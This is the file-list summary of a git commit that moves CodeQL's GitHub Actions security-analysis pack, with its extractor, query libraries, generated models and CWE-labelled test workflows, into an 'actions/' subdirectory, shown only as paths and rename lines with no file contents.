.../workflows/reusable-workflow-caller-1.yml | 0 .../workflows/reusable-workflow-caller-2.yml | 0 .../workflows/reusable-workflow-caller-3.yml | 0 .../CWE-094/.github/workflows/self_needs.yml | 0 .../CWE-094/.github/workflows/simple1.yml | 0 .../CWE-094/.github/workflows/simple2.yml | 0 .../CWE-094/.github/workflows/simple3.yml | 0 .../.github/workflows/slash_command1.yml | 0 .../.github/workflows/slash_command2.yml | 0 .../.github/workflows/sonar-source.yml | 0 .../CWE-094/.github/workflows/test.yml | 0 .../CWE-094/.github/workflows/test1.yml | 0 .../CWE-094/.github/workflows/test10.yml | 0 .../CWE-094/.github/workflows/test11.yml | 0 .../CWE-094/.github/workflows/test12.yml | 0 .../CWE-094/.github/workflows/test13.yml | 0 .../CWE-094/.github/workflows/test14.yml | 0 .../CWE-094/.github/workflows/test15.yml | 0 .../CWE-094/.github/workflows/test16.yml | 0 .../CWE-094/.github/workflows/test17.yml | 0 .../CWE-094/.github/workflows/test18.yml | 0 .../CWE-094/.github/workflows/test19.yml | 0 .../CWE-094/.github/workflows/test2.yml | 0 .../CWE-094/.github/workflows/test20.yml | 0 .../CWE-094/.github/workflows/test21.yml | 0 .../CWE-094/.github/workflows/test22.yml | 0 .../CWE-094/.github/workflows/test23.yml | 0 .../CWE-094/.github/workflows/test24.yml | 0 .../CWE-094/.github/workflows/test25.yml | 0 .../CWE-094/.github/workflows/test26.yml | 0 .../CWE-094/.github/workflows/test27.yml | 0 .../CWE-094/.github/workflows/test28.yml | 0 .../CWE-094/.github/workflows/test29.yml | 0 .../CWE-094/.github/workflows/test3.yml | 0 .../CWE-094/.github/workflows/test4.yml | 0 .../CWE-094/.github/workflows/test5.yml | 0 .../CWE-094/.github/workflows/test6.yml | 0 .../CWE-094/.github/workflows/test7.yml | 0 .../CWE-094/.github/workflows/test8.yml | 0 .../CWE-094/.github/workflows/test9.yml | 0 .../.github/workflows/untrusted_checkout1.yml | 0 .../.github/workflows/workflow_run.yml | 0 .../workflows/workflow_run_branches1.yml | 0 .../workflows/workflow_run_branches2.yml | 0 .../workflows/workflow_run_branches3.yml | 0 .../workflows/workflow_run_branches4.yml | 0 .../workflows/workflow_run_branches5.yml | 0 .../CWE-094/CodeInjectionCritical.expected | 0 .../CWE-094/CodeInjectionCritical.qlref | 0 .../CWE-094/CodeInjectionMedium.expected | 0 .../CWE-094/CodeInjectionMedium.qlref | 0 .../CWE-1395/.github/workflows/test1.yml | 0 .../UseOfKnownVulnerableAction.expected | 0 .../CWE-1395/UseOfKnownVulnerableAction.qlref | 0 .../CWE-200/.github/workflows/test1.yml | 0 .../CWE-200/SecretExfiltration.expected | 0 .../Security/CWE-200/SecretExfiltration.qlref | 0 .../CWE-275/.github/workflows/perms1.yml | 0 .../CWE-275/.github/workflows/perms2.yml | 0 .../CWE-275/.github/workflows/perms3.yml | 0 .../CWE-275/.github/workflows/perms4.yml | 0 .../CWE-275/.github/workflows/perms5.yml | 0 .../MissingActionsPermissions.expected | 0 .../CWE-275/MissingActionsPermissions.qlref | 0 .../CWE-284/.github/workflows/test1.yml | 0 .../CWE-284/.github/workflows/test2.yml | 0 .../CodeExecutionOnSelfHostedRunner.expected | 0 .../CodeExecutionOnSelfHostedRunner.qlref | 0 .../CWE-285/.github/workflows/test1.yml | 0 .../CWE-285/.github/workflows/test2.yml | 0 .../CWE-285/ImproperAccessControl.expected | 0 .../CWE-285/ImproperAccessControl.qlref | 0 .../CWE-312/.github/workflows/neg_test1.yml | 0 .../workflows/secrets-in-artifacts.yml | 0 .../CWE-312/.github/workflows/test1.yml | 0 .../CWE-312/ExcessiveSecretsExposure.expected | 0 .../CWE-312/ExcessiveSecretsExposure.qlref | 0 .../CWE-312/SecretsInArtifacts.expected | 0 .../Security/CWE-312/SecretsInArtifacts.qlref | 0 .../CWE-312/UnmaskedSecretExposure.expected | 0 .../CWE-312/UnmaskedSecretExposure.qlref | 0 .../.github/workflows/code_injection1.yml | 0 .../.github/workflows/code_injection2.yml | 0 .../.github/workflows/direct_cache1.yml | 0 .../.github/workflows/direct_cache2.yml | 0 .../.github/workflows/direct_cache3.yml | 0 .../.github/workflows/direct_cache4.yml | 0 .../.github/workflows/direct_cache5.yml | 0 .../.github/workflows/direct_cache6.yml | 0 .../.github/workflows/neg_code_injection1.yml | 0 .../.github/workflows/neg_direct_cache1.yml | 0 .../.github/workflows/neg_direct_cache2.yml | 0 .../.github/workflows/neg_direct_cache3.yml | 0 .../.github/workflows/neg_direct_cache4.yml | 0 .../.github/workflows/neg_direct_cache5.yml | 0 .../workflows/neg_poisonable_step1.yml | 0 .../workflows/neg_poisonable_step2.yml | 0 .../.github/workflows/poisonable_step1.yml | 0 .../.github/workflows/poisonable_step2.yml | 0 .../.github/workflows/poisonable_step3.yml | 0 .../.github/workflows/poisonable_step4.yml | 0 .../.github/workflows/poisonable_step5.yml | 0 .../CachePoisoningViaCodeInjection.expected | 0 .../CachePoisoningViaCodeInjection.qlref | 0 .../CachePoisoningViaDirectCache.expected | 0 .../CachePoisoningViaDirectCache.qlref | 0 .../CachePoisoningViaPoisonableStep.expected | 0 .../CachePoisoningViaPoisonableStep.qlref | 0 .../CWE-367/.github/workflows/actor.yml | 0 .../CWE-367/.github/workflows/comment.yml | 0 .../CWE-367/.github/workflows/deployment1.yml | 0 .../CWE-367/.github/workflows/deployment2.yml | 0 .../CWE-367/.github/workflows/label.yml | 0 .../CWE-367/.github/workflows/label_actor.yml | 0 .../CWE-367/.github/workflows/test0.yml | 0 .../CWE-367/.github/workflows/test1.yml | 0 .../CWE-367/.github/workflows/test2.yml | 0 .../CWE-367/.github/workflows/test3.yml | 0 .../CWE-367/.github/workflows/test4.yml | 0 .../CWE-367/.github/workflows/test5.yml | 0 .../CWE-367/.github/workflows/test6.yml | 0 .../UntrustedCheckoutTOCTOUCritical.expected | 0 .../UntrustedCheckoutTOCTOUCritical.qlref | 0 .../UntrustedCheckoutTOCTOUHigh.expected | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 0 .../CWE-571/.github/workflows/test1.yml | 0 .../CWE-571/.github/workflows/test2.yml | 0 .../ExpressionIsAlwaysTrueCritical.expected | 0 .../ExpressionIsAlwaysTrueCritical.qlref | 0 .../ExpressionIsAlwaysTrueHigh.expected | 0 .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 0 .../actions/dangerous-git-checkout/action.yml | 0 .../actions/download-artifact-2/action.yaml | 0 .../actions/download-artifact/action.yaml | 0 .../workflows/actor_trusted_checkout.yml | 0 .../workflows/artifactpoisoning101.yml | 0 .../.github/workflows/artifactpoisoning11.yml | 0 .../.github/workflows/artifactpoisoning12.yml | 0 .../.github/workflows/artifactpoisoning21.yml | 0 .../.github/workflows/artifactpoisoning22.yml | 0 .../.github/workflows/artifactpoisoning31.yml | 0 .../.github/workflows/artifactpoisoning32.yml | 0 .../.github/workflows/artifactpoisoning33.yml | 0 .../.github/workflows/artifactpoisoning34.yml | 0 .../.github/workflows/artifactpoisoning41.yml | 0 .../.github/workflows/artifactpoisoning42.yml | 0 .../.github/workflows/artifactpoisoning51.yml | 0 .../.github/workflows/artifactpoisoning52.yml | 0 .../.github/workflows/artifactpoisoning53.yml | 0 .../.github/workflows/artifactpoisoning71.yml | 0 .../.github/workflows/artifactpoisoning81.yml | 0 .../.github/workflows/artifactpoisoning82.yml | 0 .../.github/workflows/artifactpoisoning91.yml | 0 .../.github/workflows/artifactpoisoning92.yml | 0 .../CWE-829/.github/workflows/auto_ci.yml | 0 .../CWE-829/.github/workflows/dependabot1.yml | 0 .../CWE-829/.github/workflows/dependabot2.yml | 0 .../CWE-829/.github/workflows/dependabot3.yml | 0 .../TestRepo/.github/workflows/formal.yml | 0 .../TestRepo/.github/workflows/reusable.yml | 0 .../CWE-829/.github/workflows/formal.yml | 0 .../CWE-829/.github/workflows/gitcheckout.yml | 0 .../issue_comment_3rd_party_action.yml | 0 .../workflows/issue_comment_direct.yml | 0 .../workflows/issue_comment_heuristic.yml | 0 .../workflows/issue_comment_octokit.yml | 0 .../workflows/issue_comment_octokit2.yml | 0 .../workflows/label_trusted_checkout1.yml | 0 .../workflows/label_trusted_checkout2.yml | 0 .../CWE-829/.github/workflows/level0.yml | 0 .../CWE-829/.github/workflows/mend.yml | 0 .../CWE-829/.github/workflows/poc.yml | 0 .../CWE-829/.github/workflows/poc2.yml | 0 .../CWE-829/.github/workflows/poc3.yml | 0 .../.github/workflows/pr-workflow-fork.yaml | 0 .../CWE-829/.github/workflows/pr-workflow.yml | 0 .../workflows/priv_pull_request_checkout.yml | 0 .../.github/workflows/resolve-args.yml | 0 .../.github/workflows/reusable_caller1.yaml | 0 .../.github/workflows/reusable_caller2.yaml | 0 .../.github/workflows/reusable_caller3.yaml | 0 .../.github/workflows/reusable_local.yml | 0 .../CWE-829/.github/workflows/test.yml | 0 .../CWE-829/.github/workflows/test1.yml | 0 .../CWE-829/.github/workflows/test10.yml | 0 .../CWE-829/.github/workflows/test11.yml | 0 .../CWE-829/.github/workflows/test12.yml | 0 .../CWE-829/.github/workflows/test13.yml | 0 .../CWE-829/.github/workflows/test14.yml | 0 .../CWE-829/.github/workflows/test15.yml | 0 .../CWE-829/.github/workflows/test16.yml | 0 .../CWE-829/.github/workflows/test17.yml | 0 .../CWE-829/.github/workflows/test18.yml | 0 .../CWE-829/.github/workflows/test19.yml | 0 .../CWE-829/.github/workflows/test2.yml | 0 .../CWE-829/.github/workflows/test20.yml | 0 .../CWE-829/.github/workflows/test21.yml | 0 .../CWE-829/.github/workflows/test22.yml | 0 .../CWE-829/.github/workflows/test23.yml | 0 .../CWE-829/.github/workflows/test24.yml | 0 .../CWE-829/.github/workflows/test25.yml | 0 .../CWE-829/.github/workflows/test26.yml | 0 .../CWE-829/.github/workflows/test27.yml | 0 .../CWE-829/.github/workflows/test28.yml | 0 .../CWE-829/.github/workflows/test29.yml | 0 .../CWE-829/.github/workflows/test3.yml | 0 .../CWE-829/.github/workflows/test4.yml | 0 .../CWE-829/.github/workflows/test5.yml | 0 .../CWE-829/.github/workflows/test6.yml | 0 .../CWE-829/.github/workflows/test7.yml | 0 .../CWE-829/.github/workflows/test8.yml | 0 .../CWE-829/.github/workflows/test9.yml | 0 .../.github/workflows/unpinned_tags.yml | 0 .../.github/workflows/untrusted_checkout.yml | 0 .../.github/workflows/untrusted_checkout2.yml | 0 .../.github/workflows/untrusted_checkout3.yml | 0 .../.github/workflows/untrusted_checkout4.yml | 0 .../workflows/untrusted_checkout_5.yml | 0 .../workflows/untrusted_checkout_6.yml | 0 .../workflow_run_untrusted_checkout.yml | 0 .../workflow_run_untrusted_checkout_2.yml | 0 .../workflow_run_untrusted_checkout_3.yml | 0 .../ArtifactPoisoningCritical.expected | 0 .../CWE-829/ArtifactPoisoningCritical.qlref | 0 .../CWE-829/ArtifactPoisoningMedium.expected | 0 .../CWE-829/ArtifactPoisoningMedium.qlref | 0 .../ArtifactPoisoningPathTraversal.expected | 0 .../ArtifactPoisoningPathTraversal.qlref | 0 .../CWE-829/UnpinnedActionsTag.expected | 0 .../Security/CWE-829/UnpinnedActionsTag.qlref | 0 .../UntrustedCheckoutCritical.expected | 0 .../CWE-829/UntrustedCheckoutCritical.qlref | 0 .../CWE-829/UntrustedCheckoutHigh.expected | 0 .../CWE-829/UntrustedCheckoutHigh.qlref | 0 .../CWE-829/UntrustedCheckoutMedium.expected | 0 .../CWE-829/UntrustedCheckoutMedium.qlref | 0 .../UnversionedImmutableAction.expected | 0 .../CWE-829/UnversionedImmutableAction.qlref | 0 .../CWE-918/.github/workflows/test.yml | 0 .../Security/CWE-918/RequestForgery.expected | 0 .../Security/CWE-918/RequestForgery.qlref | 0 .../.github/workflows/malformed.yml | 0 .../SyntaxError/SyntaxError.expected | 0 .../query-tests/SyntaxError/SyntaxError.qlref | 0 .../ql}/test/query-tests/SyntaxError/options | 0 .../workflows/defaultable_workflow.yml | 0 .../should_be_using_advanced_setup.yml | 0 .../UnnecessaryUseOfAdvancedConfig.expected | 0 .../UnnecessaryUseOfAdvancedConfig.qlref | 0 codeql-workspace.yml | 4 -- 1322 files changed, 101 deletions(-) delete mode 100644 .github/workflows/publish.yml delete mode 100644 .github/workflows/test.yml delete mode 100644 .gitignore delete mode 100644 BUILD.bazel rename {extractor => actions/extractor}/BUILD.bazel (100%) rename {extractor => actions/extractor}/codeql-extractor.yml (100%) rename {extractor => actions/extractor}/tools/autobuild-impl.ps1 (100%) rename {extractor => actions/extractor}/tools/autobuild.cmd (100%) rename {extractor => actions/extractor}/tools/autobuild.sh (100%) rename {ql => actions/ql}/lib/actions.qll (100%) rename {ql => actions/ql}/lib/codeql-pack.lock.yml (100%) rename {ql => actions/ql}/lib/codeql/Locations.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Ast.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Bash.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Cfg.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Consistency.ql (100%) rename {ql => actions/ql}/lib/codeql/actions/DataFlow.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Helper.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/PowerShell.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/TaintTracking.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ast/internal/Ast.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ast/internal/Yaml.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/config/Config.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/config/ConfigExtensions.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/controlflow/BasicBlocks.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/controlflow/internal/Cfg.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/ExternalFlow.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/FlowSources.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/FlowSteps.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/TaintSteps.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ideContextual/IDEContextual.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ideContextual/printAst.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/ArgumentInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/ArtifactPoisoningQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/CachePoisoningQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/CodeInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/CommandInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/ControlChecks.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/EnvPathInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/EnvVarInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/OutputClobberingQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/PoisonableSteps.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/RequestForgeryQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/SecretExfiltrationQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/SelfHostedQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/UntrustedCheckoutQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll (100%) rename {ql => actions/ql}/lib/codeql/files/FileSystem.qll (100%) rename {ql => actions/ql}/lib/ext/config/argument_injection_sinks.yml (100%) rename {ql => actions/ql}/lib/ext/config/context_event_map.yml (100%) rename {ql => actions/ql}/lib/ext/config/externally_triggereable_events.yml (100%) rename {ql => actions/ql}/lib/ext/config/immutable_actions.yml (100%) rename {ql => actions/ql}/lib/ext/config/poisonable_steps.yml (100%) rename {ql => actions/ql}/lib/ext/config/untrusted_event_properties.yml (100%) rename {ql => actions/ql}/lib/ext/config/untrusted_gh_command.yml (100%) rename {ql => actions/ql}/lib/ext/config/untrusted_git_command.yml (100%) rename {ql => actions/ql}/lib/ext/config/vulnerable_actions.yml (100%) rename {ql => actions/ql}/lib/ext/config/workflow_runtime_data.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/adap_flower.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/anchore_grype.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/anchore_syft.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/angular_dev-infra.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ansible_awx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_arrow.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_brpc.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_camel-k.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_camel.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_flink.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_nuttx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_opendal.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_pekko.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_superset.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/armadaproject_armada.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/armbian_build.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/avaiga_taipy.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/badges_shields.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/balena-io_etcher.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/botpress_botpress.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/canonical_multipass.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chia-network_actions.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cilium_cilium.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/citusdata_citus.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/clerk_javascript.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/coder_coder.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/coil-kt_coil.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/commaai_openpilot.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/coturn_coturn.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/davatorium_rofi.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/debezium_debezium.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/diggerhq_digger.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/discourse_.github.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elementor_elementor.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/emberjs_data.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/emqx_emqx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/erlang_otp.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/esphome_esphome.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/expensify_app.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/expo_expo.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebook_buck2.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebook_flow.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebook_yoga.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/felangel_bloc.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/fossasia_visdom.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/freckle_stack-action.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/getsentry_action-release.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/github_codeql-action.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/github_ruby.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/gittools_gitversion.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/godotengine_godot.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/google_dagger.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml (100%) 